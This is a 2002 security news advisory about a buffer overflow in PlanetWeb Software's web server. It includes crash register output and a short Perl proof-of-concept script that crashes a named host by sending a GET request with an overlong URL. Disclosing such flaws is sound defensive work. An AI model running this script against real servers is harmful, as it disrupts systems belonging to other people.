Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » PlanetWeb Software Buffer Overflow

PlanetWeb Software Buffer Overflow

by Nikola Strahija on September 17th, 2002 A buffer overflow exists in versions 3.1 and previous of PlanetWeb Software. Exploitation of this vulnerability allows remote execution of arbitrary code with daemon privileges.


Detailed Description:
Sending a GET request containing a URL of approximately 1024 characters or more
causes Planet Web Server to crash. Exploitation is possible and proof of concept
code has been authored to demonstrate this problem.


Result:
PDNSC caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9db61.
Registers:
EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
ECX=00000000 DS=016f ESI=81770a14 FS=4217
EDX=bff76855 ES=016f EDI=02150120 GS=0000
Bytes at CS:EIP:
53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89 Stack dump:


Solution:
Disable the Planet Web Server until a patch is made available by the vendor.


----------------- exploit - cut here -----------------


#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0nn";
$remote->autoflush(1);
print $remote $exploit;
close $remote;


----------------- exploit - cut here -----------------
---

About PlanetWeb:
PlanetWeb is a complete commercial software package that provides you with everything you need to run your own website directly from your computer. It includes our lightening fast web server with integrated PHP support,
so you can create sophisticated web pages without doing any configuration!


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »